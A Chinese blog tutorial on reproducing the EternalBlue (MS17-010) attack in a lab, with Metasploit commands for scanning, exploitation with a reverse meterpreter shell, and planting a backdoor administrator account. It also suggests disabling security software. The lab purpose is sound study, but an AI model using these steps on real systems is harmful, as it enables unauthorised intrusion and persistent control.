kali永恒之藍攻擊
- 寫在前面
- 一、永恒之藍是何方神圣?
- 二、神馬是SMB協議?
- 三、MSF
- 四、攻擊步驟
- 1、攻擊主機與靶機配置
- 2、攻擊步驟
- 五、種植后門
寫在前面
??這是我的第一篇CSDN博客,最近又參加了一個CTF比賽,當然,純屬興趣愛好,本人非網路安全專業,寫這個呢是為了記錄一下去年我第一次在虛擬機上成功實作了永恒之藍攻擊,同時給一個”小朋友“做參考,目前,永恒之藍漏洞已經銷聲匿跡了,所以大可不必擔心,
一、永恒之藍是何方神圣?
??永恒之藍是指2017年4月14日晚,黑客團體Shadow Brokers(影子經紀人)公布一大批網路攻擊工具,其中包含“永恒之藍”工具,“永恒之藍”利用Windows系統的SMB漏洞可以獲取系統最高權限,5月12日,不法分子通過改造“永恒之藍”制作了wannacry勒索病毒,英國、俄羅斯、整個歐洲以及中國國內多個高校校內網、大型企業內網和政府機構專網中招,被勒索支付高額贖金才能解密恢復檔案,不過它只存在了一段時間就被修復了,
二、神馬是SMB協議?
??SMB(Server Message Block)通信協議是微軟(Microsoft)和英特爾(Intel)在1987年制定的協議,主要是作為Microsoft網路的通訊協議,SMB 是在會話層(session layer)和表示層(presentation layer)以及小部分應用層(application layer)的協議,SMB使用了NetBIOS的應用程式介面 (Application Program Interface,簡稱API),另外,它是一個開放性的協議,允許了協議擴展——使得它變得更大而且復雜;大約有65個最上層的作業,而每個作業都超過120個函式,甚至Windows NT也沒有全部支持到,
三、MSF
??接下來的攻擊演示中我們會用到msf,那么啥是msf呢?msf是目前最流行,最強大,最具擴展性的滲透測驗平臺軟體,基于metasploit進行滲透測驗和漏洞分析的流程和方法,框架集成了滲透測驗標準(PETS)思想,一定程度上統一了滲透測驗和漏洞研究的作業環境,可以比較容易新的攻擊代碼將加入框架,幾乎每周都會進行開發活躍版本更新,使用postgresql資料庫存盤資料,想更詳細的了解可以去看看這位大佬的博客:Hydraxx,
四、攻擊步驟
1、攻擊主機與靶機配置
??①:使用kali作為攻擊主機,Windows7旗艦版作為靶機,
??②:查看kali的IP地址:在終端中輸入ifconfig
可以看到kali的IP地址為192.168.42.129
??③:查看Windows7旗艦版的IP地址:CMD中輸入ipconfig
可以看到Windows7旗艦版的IP地址為192.168.42.130
2、攻擊步驟
??①、測驗兩臺主機的連通性:關閉靶機的防火墻,在kali的終端中使用ping命令去ping Windows7旗艦版靶機的IP地址,命令:
ping 192.168.42.130
可以看見兩臺主機連通性良好
??②:查看kali主機資料庫是否開啟:在終端中輸入 service postgresql status
由上圖可以看出:Active:inactive(dead)說明資料庫此時是關閉的,
??③:打開kali主機的資料庫,命令:service postgresql start
??④:再次查看kali主機的資料庫,命令:service postgresql status
從圖中可以看到:Active:inactive(exited)說明此時資料庫已經打開
注:此后的命令皆需要root權限,終端輸入su,輸入密碼即可進入root,
??附root密碼修改方法:
??⑤:初始化msfconsole資料庫,配置資料庫,命令:msfdb init
??此時就已經可以掃描永恒之藍漏洞了,永恒之藍用的是ms17_010漏洞,因此我們需要在kali中尋找ms17_010漏洞,并借此對Windows7靶機進行攻擊,獲取其管理員權限,
??⑥:啟動msf,命令:msfconsole
??這樣就成功進入msf了,界面為隨機圖案,
??⑦:然后查看資料庫連接情況,命令:db_status
??注:上面的 “msf6 >” 說明進入了msf中,
??⑧:搜索ms17_010,命令:search ms17_010
??接下來我們將會用到上圖中標記的命令
??掃描命令:use auxiliary/scanner/smb/smb_ms17_010
??攻擊命令:use exploit/windows/smb/ms17_010_eternalblue
??⑨:使用ms17_010模塊進行漏洞掃描,命令:use auxiliary/scanner/smb/smb_ms17_010
??接下來輸入options獲取具體命令
??在此,只關注兩個命令:RHOSTS和THREADS,RHOSTS是要掃描的主機(主機段),THREADS是執行緒,默認是1,開始使用執行緒加快掃描,
??⑩:設定掃描的主機,靶機IP地址是192.168.42.130,因此設定掃描主機為192.168.42.130/24:set rhosts 192.168.42.130/24;然后設定掃描執行緒為20:set threads 20,
??最后輸入run執行掃描
??由上圖可以看出,掃描出來存在ms17_010漏洞的主機,也恰好是我的靶機,
???:
??初始攻擊準備:use exploit/windows/smb/ms17_010_eternalblue
??設定攻擊目標:set rhost 192.168.42.130 (靶機)
??設定攻擊載荷:set payload windows/x64/meterpreter/reverse_tcp
??設定監聽主機:set lhost 192.168.42.129 (kali)
??進行攻擊:exploit
??出現WIN表示攻擊成功
??注:如果多次攻擊失敗可嘗試關閉主機(非虛擬機)的安全軟體,防止被攔截,本人親歷,
五、種植后門
??①:顯示遠程主機系統資訊,命令:sysinfo
??②:查看用戶身份,命令:getuid
??③:獲取遠程主機當前螢屏內容,命令:screenshot
??查看截圖
??④:進入shell,命令:shell
??出現上圖即成功
??在shell控制臺下使用如下命令:
??net user nizi 123456 /add ?在Windows7上創建一個 nizi 的用戶
??net localgroup adminstrators nizi /add ?將nizi加入到Windows7的本地管理員組中,獲得更大權限,
??net user??查看本地用戶
??net localgroup administrators??查看本地管理員
??到這里,我們的攻擊基本就結束了,關于meterpreter還有很多好玩的命令,詳情可以在meterpreter下輸入help命令獲取,也可以移步另一位大佬的博客博客園:滲透測驗中心,有疑問可以在評論區留言,下次見,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/336170.html
標籤:其他